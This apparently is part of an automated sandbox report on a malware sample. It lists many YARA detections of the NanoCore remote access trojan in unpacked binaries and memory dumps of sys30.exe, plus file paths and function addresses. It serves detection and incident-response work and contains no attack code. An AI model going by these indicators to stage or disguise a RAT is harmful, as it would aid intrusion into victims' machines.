Source: 7.2.sys30.exe.39356e8.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 7.2.sys30.exe.39356e8.11.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 7.2.sys30.exe.39356e8.11.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.d80000.15.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.d80000.15.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.379169a.26.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.379169a.26.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.389bc09.29.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.389bc09.29.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.389bc09.29.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.3770e39.27.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.3770e39.27.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 9.2.sys30.exe.3964057.31.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.3964057.31.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.630000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.630000.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.37385c8.23.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.37385c8.23.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.bc0000.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.sys30.exe.bc0000.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 9.2.sys30.exe.740000.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.684831018.0000000000540000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.684831018.0000000000540000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.685396413.0000000000630000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.685396413.0000000000630000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.684939765.0000000000560000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.684939765.0000000000560000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000007.00000002.695836802.0000000003868000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.695836802.0000000003868000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000009.00000002.693081728.0000000003770000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000009.00000002.688333112.0000000000BD0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.688333112.0000000000BD0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.689054491.00000000026D1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000009.00000002.685574966.00000000006A0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.685574966.00000000006A0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.693489208.000000000389A000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000009.00000002.687464909.00000000009F0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.687464909.00000000009F0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.682271696.0000000000072000.00000020.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.682271696.0000000000072000.00000020.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000002.695690070.0000000003719000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.695690070.0000000003719000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000009.00000002.686105411.0000000000740000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.686105411.0000000000740000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.688606934.0000000000DD0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.688606934.0000000000DD0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.688048280.0000000000BB0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.688048280.0000000000BB0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.688559291.0000000000D80000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.688559291.0000000000D80000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.688236360.0000000000BC0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.688236360.0000000000BC0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.687950106.0000000000BA0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.687950106.0000000000BA0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.694133779.0000000003A5E000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000009.00000002.688461757.0000000000C20000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.688461757.0000000000C20000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.685496610.0000000000640000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.685496610.0000000000640000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000009.00000002.693644067.0000000003908000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000007.00000002.695923409.0000000003935000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000007.00000002.695923409.0000000003935000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: sys30.exe PID: 3048, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: sys30.exe PID: 3048, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: C:\Users\Public\vbc.exeCode function: 6_2_00380B776_2_00380B77
Source: C:\Users\Public\vbc.exeCode function: 6_2_003824C06_2_003824C0
Source: C:\Users\Public\vbc.exeCode function: 6_2_00383D886_2_00383D88
Source: C:\Users\Public\vbc.exeCode function: 6_2_00385CA86_2_00385CA8
Source: C:\Users\Public\vbc.exeCode function: 6_2_003846386_2_00384638
Source: C:\Users\Public\vbc.exeCode function: 6_2_0038462A6_2_0038462A
Source: C:\Users\Public\vbc.exeCode function: 6_2_0038C7086_2_0038C708
Source: C:\Users\Public\vbc.exeCode function: 6_2_00D8BB496_2_00D8BB49
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 7_2_0038F0387_2_0038F038
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 7_2_003824C07_2_003824C0
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 7_2_00380B777_2_00380B77
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 7_2_00383D887_2_00383D88
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 7_2_0038C1187_2_0038C118
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 7_2_003846387_2_00384638
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 7_2_003846307_2_00384630
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 7_2_00385CA87_2_00385CA8
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 7_2_00C200487_2_00C20048
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 7_2_00C254787_2_00C25478
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 7_2_00C22E307_2_00C22E30
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 7_2_00C235607_2_00C23560
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 7_2_00C27D687_2_00C27D68
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 7_2_00C213707_2_00C21370
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 7_2_00C24C507_2_00C24C50
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 7_2_00C26C207_2_00C26C20
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 7_2_00C200217_2_00C20021
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 7_2_00C247C87_2_00C247C8
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 7_2_00C247D87_2_00C247D8
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 7_2_00C289987_2_00C28998
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 7_2_00C235507_2_00C23550
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 7_2_00C213687_2_00C21368
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 7_2_00C25F287_2_00C25F28
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 7_2_0122BB497_2_0122BB49
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 8_2_00250B778_2_00250B77
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 8_2_002524C08_2_002524C0
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 9_2_001CE0189_2_001CE018
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 9_2_001CBBA89_2_001CBBA8
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 9_2_001C43A09_2_001C43A0
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 9_2_001CAF909_2_001CAF90
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 9_2_001C37889_2_001C3788
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 9_2_001C44589_2_001C4458
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 9_2_001CBC669_2_001CBC66
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 9_2_0062F59C9_2_0062F59C
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 9_2_006277A09_2_006277A0
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 9_2_0062C9A09_2_0062C9A0
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 9_2_00626B889_2_00626B88
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 9_2_0062DE909_2_0062DE90
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 9_2_0062D5A89_2_0062D5A8
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 9_2_0062D5B89_2_0062D5B8
Source: C:\Users\user\AppData\Local\sys4h57g\sys30.exeCode function: 9_2_0062D6769_2_0062D676
